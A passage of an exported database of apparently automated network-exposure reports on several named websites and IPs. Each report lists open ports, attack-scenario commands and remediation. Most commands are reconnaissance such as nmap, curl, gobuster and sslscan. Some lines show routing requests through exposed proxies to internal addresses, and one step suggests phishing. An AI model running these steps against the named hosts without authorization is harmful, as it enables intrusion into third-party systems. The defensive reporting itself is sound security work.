Impact** \nUnsecured HTTP exposure can result in credential theft, session hijacking, or content tampering. It also violates compliance standards requiring encryption in transit.\n\n**Remediation** \n- Redirect all HTTP requests to HTTPS using proper rewrite rules.\n- Disable direct access to port 80 externally if not required.\n- Implement HSTS headers to enforce secure connections.\n- Reference: [OWASP A02:2021 – Cryptographic Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n\n---\n\n### Open Port 443/tcp on 34.120.190.48\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://www.veltris.com/, 34.120.190.48 |\n\n**Description** \nThe system exposes port 443/tcp on IP address `34.120.190.48` associated with domain `www.veltris.com`. This suggests an active HTTPS-enabled web service. Although standard practice, improper TLS setup or outdated software versions can introduce vulnerabilities.\n\nTools like Masscan or Nmap can be used to discover this:\n```bash\nmasscan -p443 34.120.190.48\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Perform scan:\n ```bash\n masscan -p443 34.120.190.48 --rate=1000\n ```\n2. Enumerate certificate details:\n ```bash\n openssl s_client -connect www.veltris.com:443\n ```\n3. Check for deprecated cipher suites or expired certificates.\n\n**Business Impact** \nMisconfigured HTTPS can undermine user trust, expose sensitive information, and violate regulatory requirements around secure communications.\n\n**Remediation** \n- Enforce strong TLS policies (TLS 1.2+).\n- Renew SSL certificates before expiration.\n- Audit supported cipher suites regularly.\n- Reference: [CWE-310](https://cwe.mitre.org/data/definitions/310.html)\n\n---\n\n### Open Port 80/tcp on 34.120.190.48\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://www.veltris.com/, 34.120.190.48 |\n\n**Description** \nPort 80/tcp is open on IP address `34.120.190.48`, which resolves to `www.veltris.com`. This implies a web server accepting unencrypted HTTP traffic. Without automatic redirection to HTTPS, users may transmit credentials or other sensitive data insecurely.\n\nScanning commands include:\n```bash\nnmap -p80 34.120.190.48\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Identify open port:\n ```bash\n nmap -p80 34.120.190.48\n ```\n2. Access page without encryption:\n ```bash\n curl http://www.veltris.com/\n ```\n3. Observe lack of redirect or warning indicators.\n\n**Business Impact** \nInsecure transmission of login forms or personal data can lead to interception, identity theft, and legal liability under privacy regulations.\n\n**Remediation** \n- Configure web server to automatically redirect HTTP to HTTPS.\n- Apply HSTS header to prevent downgrade attacks.\n- Remove or restrict unnecessary HTTP listeners.\n- Reference: [OWASP A07:2021 – Identification and Authentication Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n\n---\n\n### Open Port 80/tcp (HTTP) — nginx on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description** \nNginx web server is running on port 80/tcp for `www.veltris.com`. While common, exposing internal server technology can aid attackers in fingerprinting and targeting known exploits specific to Nginx versions.\n\nEnumeration example:\n```bash\ncurl -I http://www.veltris.com/\n# Server: nginx\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Detect server type:\n ```bash\n curl -I http://www.veltris.com/\n ```\n2. Search exploit databases for known Nginx vulnerabilities matching the version.\n3. Attempt directory traversal or misconfiguration exploitation.\n\n**Business Impact** \nRevealing backend technologies facilitates targeted attacks, increasing likelihood of successful compromise.\n\n**Remediation** \n- Remove or obfuscate identifying server headers (`Server:` field).\n- Keep Nginx updated to latest stable release.\n- Apply hardening guides per vendor recommendations.\n- Reference: [CWE-200](https://cwe.mitre.org/data/definitions/200.html)\n\n---\n\n### Open Port 443/tcp (HTTPS) — nginx on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description** \nSecure web service is hosted on port 443/tcp using Nginx. As with HTTP, revealing server software helps adversaries tailor their approach. Additionally, older versions might contain exploitable flaws.\n\nExample detection:\n```bash\ncurl -Ik https://www.veltris.com/\n# Server: nginx\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Identify server:\n ```bash\n curl -Ik https://www.veltris.com/\n ```\n2. Cross-reference version against vulnerability databases.\n3. Exploit known issues related to Nginx modules or configurations.\n\n**Business Impact** \nTechnology disclosure enables focused attacks, potentially leading to service disruption or unauthorized access.\n\n**Remediation** \n- Suppress server identification headers.\n- Maintain up-to-date Nginx installations.\n- Monitor for new CVEs affecting deployed components.\n- Reference: [CVE-2022-41741](https://nvd.nist.gov/vuln/detail/CVE-2022-41741)\n\n---\n\n### Open Port 8008/tcp (HTTP) on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description** \nPort 8008/tcp is open and serving HTTP traffic on `www.veltris.com`. Non-standard ports increase visibility and may indicate development/test environments or alternative administrative interfaces left exposed unintentionally.\n\nDiscovery command:\n```bash\nnmap -p8008 www.veltris.com\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for non-standard ports:\n ```bash\n nmap -p8000-9000 www.veltris.com\n ```\n2. Probe endpoint:\n ```bash\n curl http://www.veltris.com:8008/\n ```\n3. Investigate returned content for debug info or admin panels.\n\n**Business Impact** \nAlternative HTTP services may bypass normal monitoring and controls, creating hidden attack vectors.\n\n**Remediation** \n- Close unused ports unless explicitly needed.\n- Protect alternate services behind authentication or IP whitelisting.\n- Conduct regular audits of listening services across infrastructure.\n- Reference: [CWE-1190](https://cwe.mitre.org/data/definitions/1190.html)\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy) — FortiGuard Web Filtering on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description** \nPort 8015/tcp hosts an HTTP proxy identified as FortiGuard Web Filtering. Exposed proxies can be abused for anonymizing malicious traffic or bypassing filtering mechanisms.\n\nDetection:\n```bash\nnmap -sV -p8015 www.veltris.com\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Identify proxy:\n ```bash\n nmap -sV -p8015 www.veltris.com\n ```\n2. Test proxy functionality:\n ```bash\n curl --proxy http://www.veltris.com:8015 http://example.com\n ```\n3. Abuse for outbound tunneling or evasion.\n\n**Business Impact** \nPublicly available proxies enable abuse by threat actors, damaging reputation and possibly violating acceptable usage policies.\n\n**Remediation** \n- Restrict proxy access to authorized networks.\n- Log and monitor proxy usage patterns.\n- Consider disabling if not operationally necessary.\n- Reference: [CWE-668](https://cwe.mitre.org/data/definitions/668.html)\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy) — FortiGuard Web Filtering on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description** \nAnother instance of FortiGuard Web Filtering operates on port 8020/tcp. Similar concerns apply regarding unauthorized proxy usage and potential misuse.\n\nScan command:\n```bash\nnmap -sV -p8020 www.veltris.com\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Confirm proxy availability:\n ```bash\n nmap -sV -p8020 www.veltris.com\n ```\n2. Route traffic through proxy:\n ```bash\n curl --proxy http://www.veltris.com:8020 http://targetsite.com\n ```\n\n**Business Impact** \nMultiple exposed proxies compound risk and complicate tracking of malicious activity originating from the asset.\n\n**Remediation** \n- Consolidate proxy functions behind centralized control.\n- Enforce strict access controls and logging.\n- Periodically review and decommission redundant services.\n- Reference: [CWE-668](https://cwe.mitre.org/data/definitions/668.html)\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description** \nDomain `www.veltris.com` has been flagged on the DNS-based spam blacklist `list.quorum.to`. This indicates that the domain or its associated IP addresses have sent unsolicited email or exhibited behavior consistent with spam operations.\n\nVerification:\n```bash\ndig TXT +short 34.120.190.48.list.quorum.to\n```\n\n**Attack Scenario (Proof of Concept)** \n1. Query blacklists:\n ```bash\n dig TXT +short 34.120.190.48.list.quorum.to\n ```\n2. Confirm listing status.\n3. Use this knowledge to craft phishing campaigns leveraging compromised reputation.\n\n**Business Impact** \nBlacklisted domains suffer reduced deliverability, customer distrust, and possible sanctions from email providers.\n\n**Remediation** \n- Investigate root cause of spam listing (compromised mail relay, malware).\n- Request delisting from affected blacklists after remediation.\n- Implement SPF/DKIM/DMARC records to authenticate outgoing emails.\n- Reference: [OWASP Email Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Email_Security_Cheat_Sheet.html)","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a0e42cfff7cb8e001b1ffaf"},"created_at":{"$date":"2026-05-20T23:25:03.077Z"},"url":"https://springs.com.pk","tool":"generate_network_exposure_report","result":{"url":"https://springs.com.pk","category":"network_exposure","timestamp":"2026-05-20T23:25:03.068487+00:00","report":"### Open Port 80/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description** \nPort 80/tcp is open on IP address `208.91.112.55`, indicating that a web server or HTTP-based service is listening on this standard HTTP port. This exposure allows external entities to initiate communication with services running over unencrypted HTTP traffic.\n\nAn attacker can use tools like Nmap or curl to probe the endpoint for further information about the hosted application, version details, directory listings, or vulnerabilities such as misconfigurations or outdated software versions.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Identify open ports using nmap\nnmap -p 80 208.91.112.55\n\n# Retrieve basic HTTP response headers\ncurl -I http://208.91.112.55/\n\n# Attempt fingerprinting via banner grabbing\nnc 208.91.112.55 80\nGET / HTTP/1.1\nHost: 208.91.112.55\n```\n\nThis reconnaissance may reveal server identity, installed modules, or default pages which could lead to exploitation paths.\n\n**Business Impact** \nExposing port 80 without proper access controls increases the risk surface area by allowing unauthorized users to interact directly with internal systems. If not properly secured, it may expose sensitive content or provide an entry point into deeper infrastructure layers.\n\n**Remediation** \n- Restrict access to port 80 at the firewall level unless explicitly required.\n- Redirect all HTTP traffic to HTTPS (port 443).\n- Ensure no sensitive applications are exposed publicly via plaintext HTTP.\n- Apply principle of least privilege and restrict source IPs where possible.\n\n---\n\n### Open Port 8020/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description** \nPort 8020/tcp is open on IP address `208.91.112.55`. While non-standard, this port often hosts proxy servers, development environments, or custom HTTP interfaces. Without additional context from service detection, its purpose remains ambiguous but represents potential attack vectors due to lack of encryption or authentication mechanisms.\n\nAttackers typically scan ranges of high-numbered TCP ports to discover hidden administrative panels, debug interfaces, or legacy services inadvertently left accessible.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Scan for open ports including higher ranges\nnmap -p 8020 208.91.112.55\n\n# Probe the service manually\ncurl -v http://208.91.112.55:8020/\n```\n\nIf the service returns verbose error messages or exposes configuration files, attackers might gain insight into backend logic or credentials.\n\n**Business Impact** \nUnintended exposure of auxiliary services can result in lateral movement opportunities within the network, especially if these endpoints bypass normal monitoring or logging practices.\n\n**Remediation** \n- Audit and document all services bound to non-standard ports.\n- Disable unnecessary services or bind them only locally (`localhost`).\n- Implement strong authentication and TLS termination for externally facing services.\n- Monitor logs for suspicious activity targeting unusual ports.\n\n---\n\n### Open Port 443/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description** \nPort 443/tcp is open on IP address `208.91.112.55`, signifying that a secure HTTPS web server is active. Although encrypted, this still presents an attack surface for SSL/TLS-related issues, certificate mismanagement, or insecure configurations.\n\nAttackers commonly perform TLS handshake analysis, cipher suite enumeration, and certificate validation checks to assess weaknesses in cryptographic implementations.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Test supported TLS versions and ciphers\nopenssl s_client -connect 208.91.112.55:443 -tls1_2\n\n# Check certificate chain validity\necho | openssl s_client -showcerts -connect 208.91.112.55:443 2>/dev/null | openssl x509 -text -noout\n```\n\nWeak protocols (e.g., TLS 1.0), expired certificates, or self-signed certs increase vulnerability risks.\n\n**Business Impact** \nImproperly configured HTTPS can undermine user trust, violate compliance standards (PCI DSS, HIPAA), and allow man-in-the-middle attacks leading to credential theft or session hijacking.\n\n**Remediation** \n- Enforce modern TLS versions (minimum TLS 1.2).\n- Use strong cipher suites and disable weak ones (RC4, DES).\n- Regularly renew and validate SSL certificates.\n- Employ HSTS headers to enforce HTTPS usage.\n- Reference: [OWASP Transport Layer Protection](https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure)\n\n---\n\n### Open Port 8008/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description** \nPort 8008/tcp is open on IP address `208.91.112.55`. Commonly used for alternative HTTP services or reverse proxies, this port lacks standardized protection models compared to well-known ports like 80 or 443.\n\nSuch services may be less hardened against common web threats and more prone to misconfiguration errors due to reduced visibility during audits.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Enumerate service behavior\ncurl -v http://208.91.112.55:8008/\n\n# Fuzz directories or parameters\nffuf -u http://208.91.112.55:8008/FUZZ -w /path/to/dir-wordlist.txt\n```\n\nExposed APIs or test endpoints behind this port may leak internal data structures or accept malformed inputs leading to injection flaws.\n\n**Business Impact** \nInsecure deployment of alternate HTTP interfaces can expose internal APIs, staging environments, or debugging tools to public networks, increasing insider threat risks and unauthorized system manipulation.\n\n**Remediation** \n- Limit accessibility to trusted sources only.\n- Deploy WAF rulesets tailored to protect non-standard HTTP ports.\n- Remove or harden any testing/staging deployments before production release.\n- Conduct regular penetration tests focused on non-standard ports.\n\n---\n\n### Open Port 8015/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description** \nPort 8015/tcp is open on IP address `208.91.112.55`. Like other high-numbered ports, this one may host specialized services such as API gateways, reverse proxies, or embedded device interfaces. The absence of explicit identification makes it difficult to determine whether appropriate protections exist.\n\nAttackers frequently target obscure ports to find backdoors, undocumented features, or poorly maintained services.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Basic connectivity check\ntelnet 208.91.112.55 8015\n\n# Send crafted requests\nprintf \"GET / HTTP/1.1\\r\\nHost: 208.91.112.55:8015\\r\\n\\r\\n\" | nc 208.91.112.55 8015\n```\n\nResponses may include server banners, redirect locations, or error traces revealing underlying architecture.\n\n**Business Impact** \nUndocumented or forgotten services pose significant operational and security risks, particularly when they remain unpatched or unmaintained over time.\n\n**Remediation** \n- Document and inventory all services operating on non-standard ports.\n- Decommission unused or obsolete services immediately.\n- Apply consistent patch management policies across all exposed assets.\n- Integrate automated scanning tools to detect rogue services.\n\n---\n\n### Open Port 80/tcp (HTTP) – nginx 1.29.1 on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description** \nThe domain `springs.com.pk` has port 80 open and serves HTTP traffic via nginx version 1.29.1. While functional, exposing HTTP instead of enforcing HTTPS leaves communications vulnerable to interception and tampering.\n\nAdditionally, identifying the exact version helps attackers correlate known exploits tied to that build number.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Confirm server version disclosure\ncurl -I http://springs.com.pk/\n\n# Search exploit databases for nginx 1.29.1\nsearchsploit nginx 1.29\n```\n\nKnown vulnerabilities in older releases may allow remote code execution or denial-of-service conditions under certain configurations.\n\n**Business Impact** \nFailure to encrypt web traffic violates best practices and regulatory requirements. Version disclosures facilitate targeted attacks and reduce overall defense-in-depth posture.\n\n**Remediation** \n- Redirect all HTTP traffic to HTTPS using permanent redirects.\n- Suppress server version headers in nginx config:\n ```nginx\n server_tokens off;\n ```\n- Keep nginx updated to latest stable branch.\n- Reference: [CWE-200: Information Exposure](https://cwe.mitre.org/data/definitions/200.html)\n\n---\n\n### Open Port 443/tcp (HTTPS) – nginx 1.29.1 on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description** \nPort 443 is open on `springs.com.pk` and utilizes nginx 1.29.1 for serving HTTPS traffic. Despite encryption, disclosing the exact server version enables attackers to research associated vulnerabilities and tailor their approach accordingly.\n\nMoreover, improper TLS setup or missing security headers can weaken the effectiveness of HTTPS implementation.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Inspect TLS settings and header presence\ncurl -s --insecure -D - https://springs.com.pk/\n\n# Analyze TLS handshake with sslscan\nsslscan springs.com.pk\n```\n\nMissing security headers (HSTS, X-Frame-Options) leave clients susceptible to clickjacking or downgrade attacks.\n\n**Business Impact** \nEven though HTTPS provides confidentiality, poor implementation undermines user privacy and opens avenues for advanced persistent threats.\n\n**Remediation** \n- Enable recommended security headers in nginx:\n ```nginx\n add_header Strict-Transport-Security \"max-age=63072000; includeSubDomains; preload\" always;\n add_header X-Frame-Options DENY;\n add_header X-Content-Type-Options nosniff;\n ```\n- Update nginx regularly to mitigate disclosed vulnerabilities.\n- Validate certificate chains and implement OCSP stapling.\n\n---\n\n### Open Port 8008/tcp (HTTP) on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description** \nPort 8008 on `springs.com.pk` runs an HTTP service. As a non-standard port, it may indicate a secondary web interface, microservice, or development environment. These types of services often have relaxed security postures and limited oversight.\n\nAttackers leverage automated scanners to identify such endpoints and attempt to exploit them for initial footholds.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Access the service directly\ncurl http://springs.com.pk:8008/\n\n# Perform directory brute-force\ngobuster dir -u http://springs.com.pk:8008/ -w /usr/share/wordlists/dirb/common.txt\n```\n\nExposed admin panels or debug modes can grant unauthorized control over backend processes.\n\n**Business Impact** \nSecondary HTTP services increase complexity and difficulty in maintaining uniform security baselines. They also expand the attack surface unnecessarily.\n\n**Remediation** \n- Evaluate necessity of exposing this service externally.\n- Apply rate limiting and authentication measures.\n- Log and monitor access attempts to detect anomalies.\n- Consider consolidating services onto fewer standardized ports.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy) – FortiGuard Web Filtering on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description** \nPort 8015 on `springs.com.pk` operates as an HTTP proxy identified as FortiGuard Web Filtering. Proxies inherently act as intermediaries between clients and origin servers, potentially introducing new attack vectors related to forwarding behaviors, caching logic, or access control bypasses.\n\nMisconfigured proxies can become pivot points for tunneling malicious traffic or evading perimeter defenses.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Test proxy functionality\ncurl --proxy http://springs.com.pk:8015 http://example.com/\n\n# Attempt SSRF-style abuse\ncurl -x http://springs.com.pk:8015 http://internal-api.local/admin\n```\n\nSuccessful proxy misuse can enable attackers to reach otherwise inaccessible internal resources.\n\n**Business Impact** \nPublicly exposed filtering proxies can be abused to circumvent corporate policies, exfiltrate data, or launch internal reconnaissance campaigns.\n\n**Remediation** \n- Restrict proxy access to authorized IP addresses.\n- Implement strict egress filtering and logging.\n- Disable anonymous proxy capabilities unless absolutely necessary.\n- Review vendor documentation for hardening guidelines.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy) – FortiGuard Web Filtering on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description** \nSimilar to port 8015, port 8020 on `springs.com.pk` functions as another instance of FortiGuard Web Filtering acting as an HTTP proxy. Multiple proxy instances suggest either redundancy or segmentation strategies, both of which require careful configuration to prevent unintended access patterns.\n\nEach exposed proxy multiplies the risk of misconfiguration and increases the burden of securing each individual endpoint.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Verify proxy operation\ncurl --proxy http://springs.com.pk:8020 http://google.com/\n\n# Try accessing local network resources\ncurl -x http://springs.com.pk:8020 http://192.168.1.1/\n```\n\nIf allowed, this could lead to lateral movement inside the organization’s private subnet.\n\n**Business Impact** \nMultiple exposed proxies complicate incident response efforts and create redundant pathways for attackers to traverse protected boundaries undetected.\n\n**Remediation** \n- Consolidate proxy services wherever feasible.\n- Enforce mutual TLS authentication for inter-service communication.\n- Audit proxy logs for signs of abuse or anomalous routing decisions.\n- Apply zero-trust principles to limit lateral traversal possibilities.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.6 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description** \nDomain `springs.com.pk` appears on the DNS blacklist `list.quorum.to` categorized as a spam source. Being blacklisted indicates prior involvement in unsolicited email distribution, possibly due to compromised mail relays, phishing sites, or botnet participation.\n\nBlacklisting affects deliverability rates and damages organizational reputation among partners and customers alike.\n\n**Attack Scenario (Proof of Concept)** \n```bash\n# Query DNSBL status\ndig +short TXT springs.com.pk.list.quorum.to\n```\n\nA positive match confirms listing, suggesting ongoing abuse originating from the domain/IP space.\n\n**Business Impact** \nEmail delivery failures, customer complaints, and brand degradation occur when domains are flagged as spam sources. Regulatory fines may apply depending on jurisdictional laws governing digital marketing ethics.\n\n**Remediation** \n- Investigate root cause of spam classification (compromised accounts, malware infections).\n- Request delisting from affected blacklists after remediation.\n- Implement SPF/DKIM/DMARC records to authenticate outbound emails.\n- Monitor SMTP logs for suspicious relay activity.\n- Reference: [OWASP Email Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Email_Security_Cheat_Sheet.html)","summary":{"total":11}},"summary":{"total":11}},{"_id":{"$oid":"6a0f4a5037cadc7ccde99aaa"},"created_at":{"$date":"2026-05-21T18:09:20.652Z"},"url":"https://eveen.pk/","tool":"generate_network_exposure_report","result":{"url":"https://eveen.pk/","category":"network_exposure","timestamp":"2026-05-21T18:09:20.643798+00:00","report":"### Open Port 2083/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 2083/tcp is open on IP address `23.227.38.65`. This port is commonly associated with cPanel's secure webmail interface or alternative HTTPS services. The exposure of such ports can indicate potential attack vectors if not properly secured or firewalled. An attacker may use tools like Nmap or Masscan to enumerate open ports and determine running services.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker performs a basic scan using Nmap:\n```bash\nnmap -p 2083 23.227.38.65\n```\nIf the service responds, they might attempt to connect via browser or curl:\n```bash\ncurl https://23.227.38.65:2083/\n```\nDepending on configuration, this could expose login interfaces or backend systems that should not be publicly accessible without proper authentication or access control.\n\n**Business Impact** \nExposing unnecessary administrative or internal services increases the attack surface. If misconfigured, these endpoints can lead to unauthorized access, privilege escalation, or exploitation of known vulnerabilities in outdated software versions.\n\n**Remediation** \n- Restrict access to port 2083/tcp using firewall rules (e.g., iptables, AWS Security Groups).\n- Ensure only authorized IPs or networks have access.\n- Disable or remove unused services from public-facing infrastructure.\n- Regularly audit exposed ports and services for compliance with least-privilege principles.\n\n---\n\n### Open Port 2095/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 2095/tcp is open on IP address `23.227.38.65`. It typically corresponds to cPanel’s Webmail interface over HTTP. Exposing this port publicly may allow attackers to gain insight into hosting configurations or attempt brute-force attacks against user accounts.\n\n**Attack Scenario (Proof of Concept)** \nUsing Nmap:\n```bash\nnmap -sV -p 2095 23.227.38.65\n```\nIf responsive, an attacker accesses:\n```\nhttp://23.227.38.65:2095\n```\nThey may then try common credentials or exploit weak password policies to gain access to email accounts hosted under cPanel.\n\n**Business Impact** \nUnauthorized access to email accounts can result in phishing campaigns, credential theft, data exfiltration, and reputational harm due to compromised communications.\n\n**Remediation** \n- Enforce strong authentication mechanisms including MFA.\n- Limit access to trusted IP ranges via firewalling.\n- Redirect all traffic to HTTPS (port 2096) instead of exposing insecure HTTP.\n- Monitor logs for suspicious login attempts.\n\n---\n\n### Open Port 8015/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 8015/tcp is open on IP address `23.227.38.65`. While non-standard, it may host custom applications or development servers. Without further identification, its purpose remains ambiguous but still contributes to the overall attack surface.\n\n**Attack Scenario (Proof of Concept)** \nScanning with Nmap:\n```bash\nnmap -A -p 8015 23.227.38.65\n```\nIf banners reveal application details, attackers may probe for known exploits or misconfigurations:\n```bash\nnc 23.227.38.65 8015\nGET / HTTP/1.1\nHost: 23.227.38.65\n```\n\n**Business Impact** \nUnidentified services increase risk by providing unknown entry points that may lack monitoring, patching, or hardening practices.\n\n**Remediation** \n- Identify and document the service running on port 8015.\n- Apply appropriate security controls based on function.\n- Remove or restrict access to non-critical or undocumented services.\n\n---\n\n### Open Port 8080/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 8080/tcp is widely used as an alternate HTTP server port, often for reverse proxies, development environments, or containerized apps. Its presence indicates possible exposure of internal or staging systems directly to the internet.\n\n**Attack Scenario (Proof of Concept)** \nAccessing the endpoint:\n```bash\ncurl http://23.227.38.65:8080\n```\nIf it returns content, attackers will analyze headers, directory listings, or error messages for clues about underlying technology stacks.\n\n**Business Impact** \nMisconfigured reverse proxies or dev/test environments exposed to production networks pose risks of information disclosure, lateral movement, or bypassing perimeter defenses.\n\n**Remediation** \n- Ensure no sensitive or internal-only resources are served on port 8080.\n- Implement WAF or rate-limiting protections.\n- Restrict external access unless explicitly required.\n\n---\n\n### Open Port 8008/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 8008/tcp is another non-standard HTTP port sometimes used for debugging, alternate web interfaces, or legacy systems. Like other non-standard ports, its exposure adds complexity to asset management and increases vulnerability discovery chances.\n\n**Attack Scenario (Proof of Concept)** \nUsing netcat or browser:\n```bash\ntelnet 23.227.38.65 8008\n```\nOr:\n```bash\ncurl http://23.227.38.65:8008\n```\nAttackers look for default pages, debug outputs, or unauthenticated APIs.\n\n**Business Impact** \nDebugging interfaces or test deployments left online can leak system internals, API keys, or source code fragments.\n\n**Remediation** \n- Audit and decommission any temporary or testing services.\n- Block public access to non-production ports at the network level.\n- Enable logging and alerting for unexpected connections.\n\n---\n\n### Open Port 8020/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure 